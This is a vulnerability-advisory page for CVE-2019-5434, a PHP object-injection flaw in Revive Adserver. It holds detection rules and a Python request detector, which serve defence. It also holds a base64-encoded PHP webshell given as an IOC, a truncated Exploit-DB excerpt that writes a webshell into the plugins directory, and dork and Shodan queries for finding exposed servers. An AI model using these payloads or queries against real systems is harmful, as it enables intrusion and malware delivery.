CVE-2019-5434
Published: 2019-05-06
Priority: P187 · critical · CVSS 3.0: 9.8
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploited in the wild (VulnCheck KEV)
EPSS: 57.02% (98.9th percentile)
An attacker could send a specifically crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in the "openads.spc" RPC method. Such vulnerability could be used to perform various types of attacks, e.g. exploit serialize-related PHP vulnerabilities or PHP object injection. It is possible, although unconfirmed, that the vulnerability has been used by some attackers in order to gain access to some Revive Adserver instances and deliver malware through them to third party websites. This vulnerability was addressed in version 4.2.0.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| revive-sas | revive_adserver | < 4.2.0 | 4.2.0 |
| revive-sas | revive_adserver | — | — |
Detection & IOCs (extracted from sources)
Bytes IOC (base64): PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==
- Detect POST requests to /adxmlrpc.php containing the string 'openads.spc' in the body, which indicates exploitation of the vulnerable XML-RPC method.
- Look for the serialized PHP object chain in POST body to /adxmlrpc.php containing class names 'Pdp\Uri\Url', 'League\Flysystem\File', 'League\Flysystem\MountManager', and 'League\Flysystem\Plugin\ForcedCopy' — these are the gadget chain classes used in exploitation.
- Alert on GET requests to /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php or doubleclick.class.php with query parameters, indicating a dropped webshell being accessed post-exploitation.
- Detect the presence of 'data:text/html;base64,' URI scheme within POST body to /adxmlrpc.php, used to smuggle the PHP webshell payload via the Flysystem MountManager gadget.
- Monitor for creation of unexpected .php files or .htaccess files under the plugins/ directory of Revive Adserver, as the exploit writes files to plugins/.htaccess and plugins/3rdPartyServers/ox3rdPartyServers/.
- Use the Google dork 'inurl:www/delivery filetype:php' or Shodan query 'http.favicon.hash:106844876' / title 'revive adserver' to identify exposed Revive Adserver instances for proactive scanning.
- The exploit uses Content-type: application/x-www-form-urlencoded for the POST to /adxmlrpc.php despite sending XML body — this header anomaly combined with XML content can be used as a detection signal.
- The vulnerability exists in the 'what' parameter of the 'openads.spc' XML-RPC method, specifically because unserialize() is called on attacker-controlled input with no sanitization. The fix was introduced in version 4.2.0; instances running 4.1.x and earlier are vulnerable.
- Active exploitation in the wild has been reported but not confirmed — attackers may have used this to deliver malware to third-party websites through compromised Revive Adserver instances.
- The exploit gadget chain relies on the presence of specific PHP libraries (pdp/public-suffix-list, league/flysystem) in the target environment. Detection rules targeting the serialized class names are specific to this gadget chain and may not catch alternative chains.
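A request-level detector for the signals in the list above (an 'openads.spc' call in a POST to /adxmlrpc.php, the gadget-chain class names, the 'data:text/html;base64,' URI, the form-encoded Content-Type carrying an XML body, and a query-string hit on the two dropped files), as an added example written for this page rather than taken from any of the cited sources. The sample requests are constructed, not captured traffic, and the serialized payload in them is only a skeleton carrying the class names, not a working gadget chain.

```python
"""Request-level detection for the CVE-2019-5434 signals listed above.

Added example, not code from any of the cited sources. The request records
at the bottom are constructed; the serialized payload in sample 1 is a
skeleton carrying only the class names, not a working gadget chain."""
from dataclasses import dataclass

XMLRPC_PATH = "/adxmlrpc.php"

# Class names of the gadget chain named in the detection notes. Any match is
# reported; an alternative chain would need its own class list.
GADGET_CLASSES = (
    "Pdp\\Uri\\Url",
    "League\\Flysystem\\File",
    "League\\Flysystem\\MountManager",
    "League\\Flysystem\\Plugin\\ForcedCopy",
)

# Files the exploit is reported to write; a GET with a query string to either
# looks like a dropped web shell being driven.
WEBSHELL_PATHS = (
    "/plugins/3rdPartyServers/ox3rdPartyServers/max.class.php",
    "/plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php",
)


@dataclass
class Request:
    method: str
    path: str
    query: str
    content_type: str
    body: str


def parse_request(raw):
    """Parse a raw HTTP/1.1 request: request line, headers, blank line, body."""
    raw = raw.strip("\n").replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method.upper(), path, query, headers.get("content-type", ""), body)


def classify(req):
    """Return the names of the detection signals that fire for one request."""
    hits = []
    if req.method == "POST" and req.path == XMLRPC_PATH:
        if "openads.spc" in req.body:
            hits.append("xmlrpc_openads_spc")
        if any(cls in req.body for cls in GADGET_CLASSES):
            hits.append("php_gadget_chain")
        if "data:text/html;base64," in req.body:
            hits.append("data_uri_payload")
        # The exploit sends an XML body under a form-encoded Content-Type.
        if (req.content_type.lower().startswith("application/x-www-form-urlencoded")
                and req.body.lstrip().startswith("<?xml")):
            hits.append("content_type_mismatch")
    if req.method == "GET" and req.path in WEBSHELL_PATHS and req.query:
        hits.append("webshell_access")
    return hits


def scan(raw_requests):
    """Map the index of every flagged request to its list of signals."""
    flagged = {}
    for i, raw in enumerate(raw_requests):
        hits = classify(parse_request(raw))
        if hits:
            flagged[i] = hits
    return flagged


# Constructed sample traffic (not captured data).
SAMPLE_REQUESTS = [
    # 0: ordinary ad delivery call, should not fire
    r"""GET /www/delivery/ajs.php?zoneid=1 HTTP/1.1
Host: ads.example.test
""",
    # 1: crafted openads.spc call carrying gadget class names and a data: URI
    r"""POST /adxmlrpc.php HTTP/1.1
Host: ads.example.test
Content-Type: application/x-www-form-urlencoded

<?xml version="1.0"?><methodCall><methodName>openads.spc</methodName><params><param><value><string>O:11:"Pdp\Uri\Url":1:{s:3:"url";O:29:"League\Flysystem\MountManager":1:{s:3:"src";s:32:"data:text/html;base64,PLACEHOLDER";}}</string></value></param></params></methodCall>
""",
    # 2: a dropped file being requested with a query parameter
    r"""GET /plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php?0=1 HTTP/1.1
Host: ads.example.test
""",
    # 3: well-formed XML-RPC call, other method, correct Content-Type
    r"""POST /adxmlrpc.php HTTP/1.1
Host: ads.example.test
Content-Type: text/xml

<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName><params/></methodCall>
""",
]

if __name__ == "__main__":
    for idx, signals in scan(SAMPLE_REQUESTS).items():
        print(f"request {idx}: {', '.join(signals)}")
```

Each signal is reported separately so a rule engine can weight them: the Content-Type mismatch alone is weak, while the gadget class names or the data: URI inside an 'openads.spc' call are strong. The class-name check is tied to this particular chain, as the last note above warns; keep the webshell-path and file-creation monitoring in place for chains it does not cover.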
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |
GHSA
GHSA-7chh-x9j3-4vhx (ghsa_unreviewed · 2022-05-24) · CVE-2019-5434 [CRITICAL] · CWE-502
VulnCheck
revive-sas revive_adserver · Deserialization of Untrusted Data (vulncheck · 2019 · CVSS 9.8 · CVE-2019-5434 [CRITICAL])
Affected: revive-sas revive_adserver
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if re
No detection rules found.
Exploit-DB
Revive Adserver 4.2 - Remote Code Execution (exploitdb · 2019-12-03 · CVSS 9.8 · CVE-2019-5434 [CRITICAL])
---
# Exploit Title: Revive Adserver 4.2 - Remote Code Execution
# Google Dork: "inurl:www/delivery filetype:php"
# Exploit Author: crlf
# Vendor Homepage: https://www.revive-adserver.com/
# Software Link: https://www.revive-adserver.com/download/archive/
# Version: 4.1.x \'')) : @list($x, $url, $code) = $argv);
$source = 'data:text/html;base64,'.base64_encode('#');
$destination = 'plugins/.htaccess';
#$destination = 'var/.htaccess';
if(!strpos(request($url, $source, $destination), 'methodResponse')) exit(message('failed, no valid response from '.$url));
$source = 'data:text/html;base64,'.base64_encode($code);
$destination = 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php';
#$destination = 'var/default.conf.php';
request($u
Nuclei
Revive Adserver 4.2 - Remote Code Execution (nuclei · CVSS 9.8 · CVE-2019-5434 [CRITICAL])
Revive Adserver 4.2 is susceptible to remote code execution. An attacker can send a crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in the "openads.spc" RPC method. This can be exploited to perform various types of attacks, e.g. serialize-related PHP vulnerabilities or PHP object injection. It is possible, although unconfirmed, that the vulnerability has been used by some attackers in order to gain access to some Revive Adserver instances and deliver malware through them to third-party websites.
Template:
id: CVE-2019-5434
info:
name: Revive Adserver 4.2 - Remote Code Execution
author: omarjezi
severity: critical
description: |
Revive Adserver 4.2 is susceptible to remote code execut
References:
- http://packetstormsecurity.com/files/155559/Revive-Adserver-4.2-Remote-Code-Execution.html
- https://hackerone.com/reports/512076
- https://hackerone.com/reports/542670
- https://www.revive-adserver.com/security/revive-sa-2019-001/